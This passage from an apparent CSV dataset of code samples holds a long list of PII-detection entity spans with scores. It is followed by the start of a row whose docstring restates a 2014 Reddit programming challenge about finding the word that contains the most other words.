49352, score: 0.85, type: PERSON, start: 50229, end: 50259, score: 0.85, type: PERSON, start: 50545, end: 50556, score: 0.85, type: LOCATION, start: 55378, end: 55384, score: 0.85, type: DATE_TIME, start: 55434, end: 55440, score: 0.85, type: LOCATION, start: 58626, end: 58637, score: 0.85, type: PERSON, start: 58683, end: 58695, score: 0.85, type: PERSON, start: 59497, end: 59504, score: 0.85, type: PERSON, start: 59663, end: 59678, score: 0.85, type: PERSON, start: 60265, end: 60275, score: 0.85, type: LOCATION, start: 60438, end: 60447, score: 0.85, type: PERSON, start: 61175, end: 61187, score: 0.85, type: LOCATION, start: 61291, end: 61302, score: 0.85, type: LOCATION, start: 61736, end: 61747, score: 0.85, type: LOCATION, start: 61913, end: 61924, score: 0.85, type: LOCATION, start: 62065, end: 62076, score: 0.85, type: LOCATION, start: 63478, end: 63489, score: 0.85, type: LOCATION, start: 64322, end: 64333, score: 0.85, type: PERSON, start: 64901, end: 64928, score: 0.85, type: URL, start: 64906, end: 64912, score: 0.85, type: PERSON, start: 65110, end: 65119, score: 0.85, type: PERSON, start: 65302, end: 65324, score: 0.85, type: LOCATION, start: 65520, end: 65531, score: 0.85, type: NRP, start: 65617, end: 65640, score: 0.85, type: PERSON, start: 66315, end: 66323, score: 0.85, type: PERSON, start: 66432, end: 66454, score: 0.85, type: PERSON, start: 67547, end: 67564, score: 0.85, type: PERSON, start: 67900, end: 67916, score: 0.85, type: LOCATION, start: 67918, end: 67931, score: 0.85, type: PERSON, start: 68019, end: 68035, score: 0.85, type: LOCATION, start: 68037, end: 68050, score: 0.85, 
type: PERSON, start: 68397, end: 68424, score: 0.85, type: PERSON, start: 68549, end: 68558, score: 0.85, type: PERSON, start: 69005, end: 69021, score: 0.85, type: LOCATION, start: 69464, end: 69475, score: 0.85, type: PERSON, start: 70443, end: 70465, score: 0.85, type: URL, start: 150, end: 193, score: 0.6, type: URL, start: 315, end: 371, score: 0.6, type: URL, start: 375, end: 415, score: 0.6, type: URL, start: 437, end: 501, score: 0.6, type: URL, start: 505, end: 551, score: 0.6, type: URL, start: 14878, end: 14928, score: 0.6, type: URL, start: 20478, end: 20521, score: 0.6, type: URL, start: 62199, end: 62252, score: 0.6, type: URL, start: 70008, end: 70067, score: 0.6, type: URL, start: 1001, end: 1009, score: 0.5, type: URL, start: 1410, end: 1418, score: 0.5, type: URL, start: 1831, end: 1841, score: 0.5, type: URL, start: 2882, end: 2890, score: 0.5, type: URL, start: 2970, end: 2980, score: 0.5, type: URL, start: 3057, end: 3067, score: 0.5, type: URL, start: 3154, end: 3164, score: 0.5, type: URL, start: 3239, end: 3249, score: 0.5, type: URL, start: 3433, end: 3441, score: 0.5, type: URL, start: 3472, end: 3485, score: 0.5, type: URL, start: 3543, end: 3551, score: 0.5, type: URL, start: 3562, end: 3570, score: 0.5, type: URL, start: 3696, end: 3704, score: 0.5, type: URL, start: 3717, end: 3725, score: 0.5, type: URL, start: 3746, end: 3756, score: 0.5, type: URL, start: 4123, end: 4134, score: 0.5, type: URL, start: 4292, end: 4302, score: 0.5, type: URL, start: 4471, end: 4481, score: 0.5, type: URL, start: 4568, end: 4576, score: 0.5, type: URL, start: 4884, end: 4894, score: 0.5, type: URL, start: 4905, end: 4913, score: 0.5, type: URL, start: 5089, end: 5099, score: 0.5, type: URL, start: 5107, end: 5115, score: 0.5, type: URL, start: 5401, end: 5409, score: 0.5, type: URL, start: 5552, end: 5562, score: 0.5, type: URL, start: 5607, end: 5617, score: 0.5, type: URL, start: 5654, end: 5662, score: 0.5, type: URL, start: 5706, end: 5716, score: 0.5, type: URL, start: 5921, end: 5929, score: 0.5, type: URL, start: 5954, end: 5967, score: 0.5, type: URL, start: 6042, end: 6055, score: 0.5, type: URL, start: 6123, end: 6131, score: 0.5, type: URL, start: 6738, end: 6746, score: 0.5, type: URL, start: 6863, end: 6876, score: 0.5, type: URL, start: 6915, end: 6928, score: 0.5, type: URL, start: 7019, end: 7027, score: 0.5, type: URL, start: 7284, end: 7294, score: 0.5, type: URL, start: 7328, end: 7338, score: 0.5, type: URL, start: 7464, end: 7477, score: 0.5, type: URL, start: 7525, end: 7535, score: 0.5, type: URL, start: 7634, end: 7644, score: 0.5, type: URL, start: 7705, end: 7715, score: 0.5, type: URL, start: 7735, end: 7746, score: 0.5, type: URL, start: 7765, end: 7778, score: 0.5, type: URL, start: 7804, end: 7814, score: 0.5, type: URL, start: 7913, end: 7921, score: 0.5, type: URL, start: 7927, end: 7935, score: 0.5, type: URL, start: 8042, end: 8050, score: 0.5, type: URL, start: 8124, end: 8137, score: 0.5, type: URL, start: 8167, end: 8180, score: 0.5, type: URL, start: 8373, end: 8381, score: 0.5, type: URL, start: 8388, end: 8396, score: 0.5, type: URL, start: 8792, end: 8800, score: 0.5, type: URL, start: 9017, end: 9039, score: 0.5, type: URL, start: 9328, end: 9336, score: 0.5, type: URL, start: 9370, end: 9383, score: 0.5, type: URL, start: 10287, end: 10295, score: 0.5, type: URL, start: 11035, end: 11043, score: 0.5, type: URL, start: 11372, end: 11383, score: 0.5, type: URL, start: 11808, end: 11818, score: 0.5, type: URL, start: 12029, end: 12037, 
score: 0.5, type: URL, start: 12415, end: 12423, score: 0.5, type: URL, start: 12586, end: 12596, score: 0.5, type: URL, start: 12741, end: 12749, score: 0.5, type: URL, start: 12789, end: 12797, score: 0.5, type: URL, start: 12981, end: 12989, score: 0.5, type: URL, start: 13713, end: 13726, score: 0.5, type: URL, start: 13746, end: 13754, score: 0.5, type: URL, start: 13775, end: 13783, score: 0.5, type: URL, start: 14085, end: 14098, score: 0.5, type: URL, start: 14153, end: 14171, score: 0.5, type: URL, start: 14189, end: 14207, score: 0.5, type: URL, start: 14278, end: 14291, score: 0.5, type: URL, start: 14443, end: 14451, score: 0.5, type: URL, start: 14699, end: 14709, score: 0.5, type: URL, start: 15385, end: 15393, score: 0.5, type: URL, start: 15395, end: 15403, score: 0.5, type: URL, start: 15410, end: 15423, score: 0.5, type: URL, start: 15445, end: 15455, score: 0.5, type: URL, start: 15462, end: 15467, score: 0.5, type: URL, start: 15478, end: 15483, score: 0.5, type: URL, start: 15507, end: 15517, score: 0.5, type: URL, start: 15527, end: 15535, score: 0.5, type: URL, start: 15558, end: 15568, score: 0.5, type: URL, start: 15578, end: 15591, score: 0.5, type: URL, start: 15606, end: 15611, score: 0.5, type: URL, start: 15634, end: 15639, score: 0.5, type: URL, start: 15698, end: 15706, score: 0.5, type: URL, start: 15731, end: 15736, score: 0.5, type: URL, start: 15747, end: 15757, score: 0.5, type: URL, start: 15764, end: 15769, score: 0.5, type: URL, start: 15780, end: 15786, score: 0.5, type: URL, start: 15814, end: 15824, score: 0.5, type: URL, start: 15834, end: 15842, score: 0.5, type: URL, start: 15869, end: 15879, score: 0.5, type: URL, start: 15889, end: 15902, score: 0.5, type: URL, start: 15917, end: 15922, score: 0.5, type: URL, start: 15945, end: 15950, score: 0.5, type: URL, start: 16088, end: 16096, score: 0.5, type: URL, start: 16173, end: 16181, score: 0.5, type: URL, start: 16240, end: 16246, score: 0.5, type: URL, start: 16309, end: 16317, score: 0.5, type: URL, start: 16419, end: 16427, score: 0.5, type: URL, start: 16689, end: 16694, score: 0.5, type: URL, start: 16754, end: 16767, score: 0.5, type: URL, start: 16825, end: 16835, score: 0.5, type: URL, start: 16842, end: 16847, score: 0.5, type: URL, start: 16880, end: 16885, score: 0.5, type: URL, start: 16907, end: 16912, score: 0.5, type: URL, start: 16992, end: 17005, score: 0.5, type: URL, start: 17036, end: 17041, score: 0.5, type: URL, start: 17182, end: 17190, score: 0.5, type: URL, start: 17276, end: 17284, score: 0.5, type: URL, start: 17308, end: 17323, score: 0.5, type: URL, start: 17383, end: 17398, score: 0.5, type: URL, start: 17470, end: 17483, score: 0.5, type: URL, start: 17517, end: 17525, score: 0.5, type: URL, start: 17545, end: 17555, score: 0.5, type: URL, start: 17565, end: 17573, score: 0.5, type: URL, start: 17590, end: 17605, score: 0.5, type: URL, start: 17666, end: 17675, score: 0.5, type: URL, start: 17693, end: 17702, score: 0.5, type: URL, start: 17835, end: 17844, score: 0.5, type: URL, start: 17919, end: 17925, score: 0.5, type: URL, start: 17937, end: 17943, score: 0.5, type: URL, start: 17980, end: 17986, score: 0.5, type: URL, start: 18043, end: 18049, score: 0.5, type: URL, start: 18218, end: 18224, score: 0.5, type: URL, start: 18277, end: 18283, score: 0.5, type: URL, start: 19141, end: 19147, score: 0.5, type: URL, start: 19477, end: 19481, score: 0.5, type: URL, start: 19783, end: 19788, score: 0.5, type: URL, start: 19817, end: 19823, score: 0.5, type: URL, 
start: 19860, end: 19869, score: 0.5, type: URL, start: 19883, end: 19887, score: 0.5, type: URL, start: 20241, end: 20249, score: 0.5, type: URL, start: 20294, end: 20302, score: 0.5, type: URL, start: 20550, end: 20560, score: 0.5, type: URL, start: 20790, end: 20812, score: 0.5, type: URL, start: 20907, end: 20917, score: 0.5, type: URL, start: 21352, end: 21360, score: 0.5, type: URL, start: 21388, end: 21398, score: 0.5, type: URL, start: 21432, end: 21438, score: 0.5, type: URL, start: 21452, end: 21458, score: 0.5, type: URL, start: 21518, end: 21524, score: 0.5, type: URL, start: 21568, end: 21574, score: 0.5, type: URL, start: 21622, end: 21628, score: 0.5, type: URL, start: 22422, end: 22428, score: 0.5, type: URL, start: 22758, end: 22762, score: 0.5, type: URL, start: 23068, end: 23073, score: 0.5, type: URL, start: 23102, end: 23108, score: 0.5, type: URL, start: 23145, end: 23154, score: 0.5, type: URL, start: 23168, end: 23172, score: 0.5, type: URL, start: 23579, end: 23589, score: 0.5, type: URL, start: 23613, end: 23623, score: 0.5, type: URL, start: 24203, end: 24213, score: 0.5, type: URL, start: 24279, end: 24287, score: 0.5, type: URL, start: 24314, end: 24324, score: 0.5, type: URL, start: 24405, end: 24415, score: 0.5, type: URL, start: 24503, end: 24507, score: 0.5, type: URL, start: 24533, end: 24540, score: 0.5, type: URL, start: 24597, end: 24602, score: 0.5, type: URL, start: 24694, end: 24699, score: 0.5, type: URL, start: 24721, end: 24728, score: 0.5, type: URL, start: 24781, end: 24786, score: 0.5, type: URL, start: 24874, end: 24879, score: 0.5, type: URL, start: 24894, end: 24898, score: 0.5, type: URL, start: 25254, end: 25265, score: 0.5, type: URL, start: 25452, end: 25456, score: 0.5, type: URL, start: 25471, end: 25482, score: 0.5, type: URL, start: 25706, end: 25710, score: 0.5, type: URL, start: 26291, end: 26296, score: 0.5, type: URL, start: 26583, end: 26589, score: 0.5, type: URL, start: 27534, end: 27544, score: 0.5, type: URL, start: 27675, end: 27680, score: 0.5, type: URL, start: 27690, end: 27700, score: 0.5, type: URL, start: 27859, end: 27865, score: 0.5, type: URL, start: 27901, end: 27907, score: 0.5, type: URL, start: 28545, end: 28551, score: 0.5, type: URL, start: 28722, end: 28728, score: 0.5, type: URL, start: 29967, end: 29972, score: 0.5, type: URL, start: 30286, end: 30291, score: 0.5, type: URL, start: 30318, end: 30324, score: 0.5, type: URL, start: 30789, end: 30794, score: 0.5, type: URL, start: 30869, end: 30874, score: 0.5, type: URL, start: 31368, end: 31377, score: 0.5, type: URL, start: 31560, end: 31571, score: 0.5, type: URL, start: 31659, end: 31663, score: 0.5, type: URL, start: 31734, end: 31754, score: 0.5, type: URL, start: 32365, end: 32373, score: 0.5, type: URL, start: 32431, end: 32440, score: 0.5, type: URL, start: 32585, end: 32593, score: 0.5, type: URL, start: 32674, end: 32683, score: 0.5, type: URL, start: 35671, end: 35678, score: 0.5, type: URL, start: 36248, end: 36256, score: 0.5, type: URL, start: 36343, end: 36352, score: 0.5, type: URL, start: 36419, end: 36434, score: 0.5, type: URL, start: 36490, end: 36495, score: 0.5, type: URL, start: 38390, end: 38399, score: 0.5, type: URL, start: 38544, end: 38553, score: 0.5, type: URL, start: 38905, end: 38915, score: 0.5, type: URL, start: 39197, end: 39203, score: 0.5, type: URL, start: 39408, end: 39418, score: 0.5, type: URL, start: 39650, end: 39656, score: 0.5, type: URL, start: 39704, end: 39709, score: 0.5, type: URL, start: 40015, end: 40021, 
score: 0.5, type: URL, start: 40086, end: 40092, score: 0.5, type: URL, start: 40151, end: 40157, score: 0.5, type: URL, start: 40543, end: 40553, score: 0.5, type: URL, start: 40619, end: 40627, score: 0.5, type: URL, start: 40654, end: 40664, score: 0.5, type: URL, start: 40745, end: 40755, score: 0.5, type: URL, start: 40843, end: 40847, score: 0.5, type: URL, start: 40873, end: 40880, score: 0.5, type: URL, start: 40937, end: 40942, score: 0.5, type: URL, start: 41034, end: 41039, score: 0.5, type: URL, start: 41061, end: 41068, score: 0.5, type: URL, start: 41121, end: 41126, score: 0.5, type: URL, start: 41214, end: 41219, score: 0.5, type: URL, start: 41234, end: 41238, score: 0.5, type: URL, start: 41594, end: 41605, score: 0.5, type: URL, start: 41792, end: 41796, score: 0.5, type: URL, start: 41811, end: 41822, score: 0.5, type: URL, start: 42046, end: 42050, score: 0.5, type: URL, start: 42630, end: 42635, score: 0.5, type: URL, start: 42918, end: 42924, score: 0.5, type: URL, start: 43867, end: 43877, score: 0.5, type: URL, start: 44008, end: 44013, score: 0.5, type: URL, start: 44023, end: 44033, score: 0.5, type: URL, start: 44190, end: 44196, score: 0.5, type: URL, start: 44232, end: 44238, score: 0.5, type: URL, start: 44874, end: 44880, score: 0.5, type: URL, start: 45051, end: 45057, score: 0.5, type: URL, start: 46296, end: 46301, score: 0.5, type: URL, start: 46613, end: 46618, score: 0.5, type: URL, start: 46645, end: 46651, score: 0.5, type: URL, start: 47110, end: 47115, score: 0.5, type: URL, start: 47190, end: 47195, score: 0.5, type: URL, start: 47658, end: 47668, score: 0.5, type: URL, start: 47745, end: 47751, score: 0.5, type: URL, start: 47787, end: 47793, score: 0.5, type: URL, start: 47995, end: 48000, score: 0.5, type: URL, start: 48053, end: 48063, score: 0.5, type: URL, start: 48122, end: 48135, score: 0.5, type: URL, start: 48260, end: 48264, score: 0.5, type: URL, start: 48290, end: 48297, score: 0.5, type: URL, start: 48372, end: 48379, score: 0.5, type: URL, start: 48441, end: 48445, score: 0.5, type: URL, start: 48620, end: 48624, score: 0.5, type: URL, start: 48990, end: 49000, score: 0.5, type: URL, start: 49024, end: 49034, score: 0.5, type: URL, start: 49491, end: 49504, score: 0.5, type: URL, start: 49899, end: 49909, score: 0.5, type: URL, start: 49991, end: 49995, score: 0.5, type: URL, start: 50074, end: 50084, score: 0.5, type: URL, start: 50096, end: 50101, score: 0.5, type: URL, start: 50264, end: 50274, score: 0.5, type: URL, start: 50299, end: 50304, score: 0.5, type: URL, start: 50413, end: 50423, score: 0.5, type: URL, start: 50924, end: 50933, score: 0.5, type: URL, start: 51116, end: 51127, score: 0.5, type: URL, start: 51215, end: 51219, score: 0.5, type: URL, start: 51290, end: 51310, score: 0.5, type: URL, start: 51915, end: 51923, score: 0.5, type: URL, start: 51981, end: 51990, score: 0.5, type: URL, start: 52135, end: 52143, score: 0.5, type: URL, start: 52222, end: 52231, score: 0.5, type: URL, start: 55199, end: 55206, score: 0.5, type: URL, start: 55775, end: 55783, score: 0.5, type: URL, start: 55867, end: 55876, score: 0.5, type: URL, start: 55908, end: 55923, score: 0.5, type: URL, start: 55959, end: 55966, score: 0.5, type: URL, start: 56031, end: 56036, score: 0.5, type: URL, start: 57921, end: 57930, score: 0.5, type: URL, start: 58075, end: 58084, score: 0.5, type: URL, start: 58626, end: 58632, score: 0.5, type: URL, start: 58671, end: 58682, score: 0.5, type: URL, start: 58710, end: 58716, score: 0.5, type: URL, 
start: 58808, end: 58814, score: 0.5, type: URL, start: 58861, end: 58869, score: 0.5, type: URL, start: 58887, end: 58898, score: 0.5, type: URL, start: 58900, end: 58906, score: 0.5, type: URL, start: 58956, end: 58962, score: 0.5, type: URL, start: 58989, end: 58995, score: 0.5, type: URL, start: 59012, end: 59018, score: 0.5, type: URL, start: 59070, end: 59083, score: 0.5, type: URL, start: 59198, end: 59208, score: 0.5, type: URL, start: 59217, end: 59223, score: 0.5, type: URL, start: 59280, end: 59290, score: 0.5, type: URL, start: 59447, end: 59455, score: 0.5, type: URL, start: 59630, end: 59641, score: 0.5, type: URL, start: 59681, end: 59692, score: 0.5, type: URL, start: 60278, end: 60289, score: 0.5, type: URL, start: 60438, end: 60444, score: 0.5, type: URL, start: 60619, end: 60625, score: 0.5, type: URL, start: 60683, end: 60689, score: 0.5, type: URL, start: 61291, end: 61297, score: 0.5, type: URL, start: 61316, end: 61322, score: 0.5, type: URL, start: 61375, end: 61383, score: 0.5, type: URL, start: 61519, end: 61527, score: 0.5, type: URL, start: 61679, end: 61687, score: 0.5, type: URL, start: 61736, end: 61742, score: 0.5, type: URL, start: 61764, end: 61772, score: 0.5, type: URL, start: 61913, end: 61919, score: 0.5, type: URL, start: 62065, end: 62071, score: 0.5, type: URL, start: 62334, end: 62346, score: 0.5, type: URL, start: 62782, end: 62789, score: 0.5, type: URL, start: 62844, end: 62851, score: 0.5, type: URL, start: 63478, end: 63484, score: 0.5, type: URL, start: 63504, end: 63518, score: 0.5, type: URL, start: 63584, end: 63597, score: 0.5, type: URL, start: 63831, end: 63836, score: 0.5, type: URL, start: 63870, end: 63880, score: 0.5, type: URL, start: 63975, end: 63981, score: 0.5, type: URL, start: 64035, end: 64045, score: 0.5, type: URL, start: 64114, end: 64120, score: 0.5, type: URL, start: 64322, end: 64328, score: 0.5, type: URL, start: 64647, end: 64653, score: 0.5, type: URL, start: 64820, end: 64826, score: 0.5, type: URL, start: 64984, end: 64990, score: 0.5, type: URL, start: 65110, end: 65116, score: 0.5, type: URL, start: 65229, end: 65235, score: 0.5, type: URL, start: 65302, end: 65308, score: 0.5, type: URL, start: 65520, end: 65526, score: 0.5, type: URL, start: 65546, end: 65567, score: 0.5, type: URL, start: 65617, end: 65637, score: 0.5, type: URL, start: 65921, end: 65950, score: 0.5, type: URL, start: 65998, end: 66006, score: 0.5, type: URL, start: 66157, end: 66165, score: 0.5, type: URL, start: 66230, end: 66240, score: 0.5, type: URL, start: 66409, end: 66419, score: 0.5, type: URL, start: 66432, end: 66438, score: 0.5, type: URL, start: 66703, end: 66711, score: 0.5, type: URL, start: 66868, end: 66878, score: 0.5, type: URL, start: 66911, end: 66921, score: 0.5, type: URL, start: 67000, end: 67008, score: 0.5, type: URL, start: 67064, end: 67077, score: 0.5, type: URL, start: 67106, end: 67119, score: 0.5, type: URL, start: 67170, end: 67183, score: 0.5, type: URL, start: 67221, end: 67229, score: 0.5, type: URL, start: 67268, end: 67281, score: 0.5, type: URL, start: 67338, end: 67351, score: 0.5, type: URL, start: 67399, end: 67412, score: 0.5, type: URL, start: 67918, end: 67933, score: 0.5, type: URL, start: 67959, end: 67974, score: 0.5, type: URL, start: 68037, end: 68052, score: 0.5, type: URL, start: 68122, end: 68130, score: 0.5, type: URL, start: 68157, end: 68163, score: 0.5, type: URL, start: 68191, end: 68201, score: 0.5, type: URL, start: 68211, end: 68219, score: 0.5, type: URL, start: 68307, end: 68313, 
score: 0.5, type: URL, start: 68364, end: 68370, score: 0.5, type: URL, start: 68402, end: 68408, score: 0.5, type: URL, start: 68468, end: 68474, score: 0.5, type: URL, start: 68549, end: 68555, score: 0.5, type: URL, start: 68658, end: 68664, score: 0.5, type: URL, start: 68726, end: 68732, score: 0.5, type: URL, start: 68788, end: 68798, score: 0.5, type: URL, start: 68801, end: 68806, score: 0.5, type: URL, start: 68817, end: 68823, score: 0.5, type: URL, start: 68887, end: 68892, score: 0.5, type: URL, start: 68981, end: 68985, score: 0.5, type: URL, start: 69373, end: 69386, score: 0.5, type: URL, start: 69423, end: 69433, score: 0.5, type: URL, start: 69464, end: 69475, score: 0.5, type: URL, start: 69610, end: 69620, score: 0.5, type: URL, start: 69630, end: 69641, score: 0.5, type: URL, start: 69769, end: 69776, score: 0.5, type: URL, start: 69882, end: 69893, score: 0.5, type: URL, start: 69982, end: 69993, score: 0.5, type: URL, start: 70182, end: 70195, score: 0.5, type: URL, start: 70248, end: 70261, score: 0.5, type: URL, start: 70266, end: 70277, score: 0.5, type: URL, start: 70351, end: 70364, score: 0.5, type: URL, start: 70396, end: 70409, score: 0.5, type: URL, start: 70422, end: 70433, score: 0.5, type: URL, start: 70443, end: 70449, score: 0.5, type: URL, start: 70545, end: 70556, score: 0.5, type: URL, start: 70574, end: 70580, score: 0.5, type: URL, start: 70677, end: 70683, score: 0.5, type: URL, start: 70757, end: 70768, score: 0.5, type: URL, start: 70873, end: 70883, score: 0.5, type: URL, start: 70960, end: 70966, score: 0.5, type: URL, start: 71057, end: 71065, score: 0.5, type: URL, start: 71172, end: 71180, score: 0.5, type: URL, start: 71214, end: 71218, score: 0.5, type: URL, start: 71289, end: 71297, score: 0.5, type: URL, start: 71325, end: 71338, score: 0.5, type: URL, start: 71377, end: 71385, score: 0.5, type: URL, start: 71415, end: 71428, score: 0.5, type: URL, start: 71466, end: 71474, score: 0.5, type: URL, start: 71507, end: 71520, score: 0.5, type: URL, start: 71579, end: 71592, score: 0.5, type: URL, start: 71712, end: 71720, score: 0.5, type: URL, start: 71971, end: 71984, score: 0.5, type: URL, start: 72031, end: 72044, score: 0.5, type: URL, start: 72165, end: 72178, score: 0.5, type: URL, start: 72206, end: 72219, score: 0.5, type: URL, start: 72291, end: 72299, score: 0.5, type: URL, start: 72329, end: 72337, score: 0.5, type: URL, start: 72434, end: 72440, score: 0.5, type: EMAIL_ADDRESS, start: 104, end: 119, score: 1.0, type: PERSON, start: 42, end: 46, score: 0.85, type: DATE_TIME, start: 64, end: 73, score: 0.85, type: PERSON, start: 74, end: 88, score: 0.85, type: LOCATION, start: 145, end: 156, score: 0.85, type: PERSON, start: 733, end: 744, score: 0.85, type: PERSON, start: 1095, end: 1106, score: 0.85, type: LOCATION, start: 1272, end: 1283, score: 0.85, type: PERSON, start: 1387, end: 1398, score: 0.85, type: LOCATION, start: 1476, end: 1487, score: 0.85, type: DATE_TIME, start: 2633, end: 2642, score: 0.85, type: PERSON, start: 3851, end: 3855, score: 0.85, type: PERSON, start: 4133, end: 4137, score: 0.85, type: PERSON, start: 4216, end: 4227, score: 0.85, type: LOCATION, start: 7490, end: 7497, score: 0.85, type: LOCATION, start: 8310, end: 8317, score: 0.85, type: DATE_TIME, start: 8689, end: 8701, score: 0.85, type: PERSON, start: 8813, end: 8840, score: 0.85, type: DATE_TIME, start: 9842, end: 9846, score: 0.85, type: LOCATION, start: 9888, end: 9895, score: 0.85, type: NRP, start: 11111, end: 11115, score: 0.85, type: NRP, 
start: 11411, end: 11415, score: 0.85, type: PERSON, start: 11960, end: 11971, score: 0.85, type: DATE_TIME, start: 15593, end: 15597, score: 0.85, type: URL, start: 760, end: 788, score: 0.6, type: URL, start: 6998, end: 7062, score: 0.6, type: URL, start: 8349, end: 8403, score: 0.6, type: URL, start: 14416, end: 14459, score: 0.6, type: URL, start: 14729, end: 14797, score: 0.6, type: URL, start: 15249, end: 15292, score: 0.6, type: URL, start: 15301, end: 15344, score: 0.6, type: URL, start: 110, end: 119, score: 0.5, type: URL, start: 1238, end: 1252, score: 0.5, type: URL, start: 1483, end: 1491, score: 0.5, type: URL, start: 1577, end: 1587, score: 0.5, type: URL, start: 1612, end: 1622, score: 0.5, type: URL, start: 1654, end: 1664, score: 0.5, type: URL, start: 1699, end: 1709, score: 0.5, type: URL, start: 1915, end: 1927, score: 0.5, type: URL, start: 1943, end: 1955, score: 0.5, type: URL, start: 2064, end: 2076, score: 0.5, type: URL, start: 2092, end: 2104, score: 0.5, type: URL, start: 2131, end: 2143, score: 0.5, type: URL, start: 2162, end: 2174, score: 0.5, type: URL, start: 2231, end: 2241, score: 0.5, type: URL, start: 2350, end: 2362, score: 0.5, type: URL, start: 2515, end: 2527, score: 0.5, type: URL, start: 2997, end: 3007, score: 0.5, type: URL, start: 3084, end: 3094, score: 0.5, type: URL, start: 3211, end: 3220, score: 0.5, type: URL, start: 3328, end: 3338, score: 0.5, type: URL, start: 3689, end: 3701, score: 0.5, type: URL, start: 4029, end: 4037, score: 0.5, type: URL, start: 4061, end: 4069, score: 0.5, type: URL, start: 4102, end: 4109, score: 0.5, type: URL, start: 4263, end: 4280, score: 0.5, type: URL, start: 4294, end: 4301, score: 0.5, type: URL, start: 4327, end: 4334, score: 0.5, type: URL, start: 4411, end: 4421, score: 0.5, type: URL, start: 4453, end: 4465, score: 0.5, type: URL, start: 4597, end: 4614, score: 0.5, type: URL, start: 4620, end: 4632, score: 0.5, type: URL, start: 4708, end: 4715, score: 0.5, type: URL, start: 4826, end: 4832, score: 0.5, type: URL, start: 4841, end: 4850, score: 0.5, type: URL, start: 4869, end: 4883, score: 0.5, type: URL, start: 4889, end: 4901, score: 0.5, type: URL, start: 4946, end: 4955, score: 0.5, type: URL, start: 4962, end: 4971, score: 0.5, type: URL, start: 4989, end: 4996, score: 0.5, type: URL, start: 5018, end: 5025, score: 0.5, type: URL, start: 5165, end: 5183, score: 0.5, type: URL, start: 5289, end: 5296, score: 0.5, type: URL, start: 5300, end: 5309, score: 0.5, type: URL, start: 5395, end: 5402, score: 0.5, type: URL, start: 5406, end: 5415, score: 0.5, type: URL, start: 5458, end: 5465, score: 0.5, type: URL, start: 5469, end: 5478, score: 0.5, type: URL, start: 5852, end: 5866, score: 0.5, type: URL, start: 6199, end: 6205, score: 0.5, type: URL, start: 6232, end: 6249, score: 0.5, type: URL, start: 6351, end: 6361, score: 0.5, type: URL, start: 6419, end: 6429, score: 0.5, type: URL, start: 6479, end: 6488, score: 0.5, type: URL, start: 6514, end: 6533, score: 0.5, type: URL, start: 6600, end: 6609, score: 0.5, type: URL, start: 6638, end: 6657, score: 0.5, type: URL, start: 6727, end: 6736, score: 0.5, type: URL, start: 6755, end: 6774, score: 0.5, type: URL, start: 6858, end: 6875, score: 0.5, type: URL, start: 7104, end: 7116, score: 0.5, type: URL, start: 7143, end: 7151, score: 0.5, type: URL, start: 7576, end: 7581, score: 0.5, type: URL, start: 7830, end: 7835, score: 0.5, type: URL, start: 7909, end: 7918, score: 0.5, type: URL, start: 8445, end: 8457, score: 0.5, type: URL, start: 
8488, end: 8501, score: 0.5, type: URL, start: 8576, end: 8591, score: 0.5, type: URL, start: 8736, end: 8746, score: 0.5, type: URL, start: 8813, end: 8823, score: 0.5, type: URL, start: 9030, end: 9037, score: 0.5, type: URL, start: 9066, end: 9073, score: 0.5, type: URL, start: 9113, end: 9120, score: 0.5, type: URL, start: 9218, end: 9231, score: 0.5, type: URL, start: 9631, end: 9640, score: 0.5, type: URL, start: 9747, end: 9759, score: 0.5, type: URL, start: 10495, end: 10505, score: 0.5, type: URL, start: 10962, end: 10975, score: 0.5, type: URL, start: 11019, end: 11029, score: 0.5, type: URL, start: 11844, end: 11853, score: 0.5, type: URL, start: 12042, end: 12056, score: 0.5, type: URL, start: 12164, end: 12181, score: 0.5, type: URL, start: 12223, end: 12229, score: 0.5, type: URL, start: 12943, end: 12950, score: 0.5, type: URL, start: 13018, end: 13025, score: 0.5, type: URL, start: 13078, end: 13087, score: 0.5, type: URL, start: 13261, end: 13275, score: 0.5, type: URL, start: 13383, end: 13400, score: 0.5, type: URL, start: 13421, end: 13431, score: 0.5, type: URL, start: 13440, end: 13452, score: 0.5, type: URL, start: 13587, end: 13599, score: 0.5, type: URL, start: 13772, end: 13779, score: 0.5, type: URL, start: 13834, end: 13844, score: 0.5, type: URL, start: 13853, end: 13865, score: 0.5, type: URL, start: 14006, end: 14018, score: 0.5, type: URL, start: 14197, end: 14204, score: 0.5, type: URL, start: 14487, end: 14501, score: 0.5, type: URL, start: 14809, end: 14819, score: 0.5, type: URL, start: 14886, end: 14897, score: 0.5, type: URL, start: 14968, end: 14978, score: 0.5, type: URL, start: 14981, end: 14995, score: 0.5, type: URL, start: 15026, end: 15031, score: 0.5, type: URL, start: 15403, end: 15417, score: 0.5, type: URL, start: 15452, end: 15462, score: 0.5, type: URL, start: 15664, end: 15678, score: 0.5, type: URL, start: 15861, end: 15875, score: 0.5, type: URL, start: 15973, end: 15983, score: 0.5, type: URL, start: 16140, end: 16145, score: 0.5, type: URL, start: 16204, end: 16215, score: 0.5, type: URL, start: 16420, end: 16425, score: 0.5, type: URL, start: 16489, end: 16498, score: 0.5, type: URL, start: 16570, end: 16582, score: 0.5, type: URL, start: 16613, end: 16623, score: 0.5, type: URL, start: 16641, end: 16651, score: 0.5, type: URL, start: 16766, end: 16776, score: 0.5, type: URL, start: 16785, end: 16797, score: 0.5, type: URL, start: 17076, end: 17088, score: 0.5, type: URL, start: 17173, end: 17184, score: 0.5, type: URL, start: 17216, end: 17230, score: 0.5, type: URL, start: 17328, end: 17335, score: 0.5, type: URL, start: 17417, end: 17427, score: 0.5]" +,code,length,entities +0,""""""" +[2014-11-26] Challenge #190 [Intermediate] Words inside of words + +https://www.reddit.PI:KEY + +#Description +This weeks challenge is a short yet interesting one that should hopefully help you exercise elegant solutions to a +problem rather than bruteforcing a challenge. +#Challenge +Given the wordlist [enable1.txt](http://www.joereynoldsaudio.com/enable1.txt), you must find the word in that file +which also contains the greatest number of words within that word. +For example, the word 'grayson' has the following words in it +Grayson +Gray +Grays +Ray +Rays +Son +On +Here's another example, the word 'reports' has the following +reports +report +port +ports +rep +You're tasked with finding the word in that file that contains the most words. +NOTE : If you have a different wordlist you would like to use, you're free to do so. 
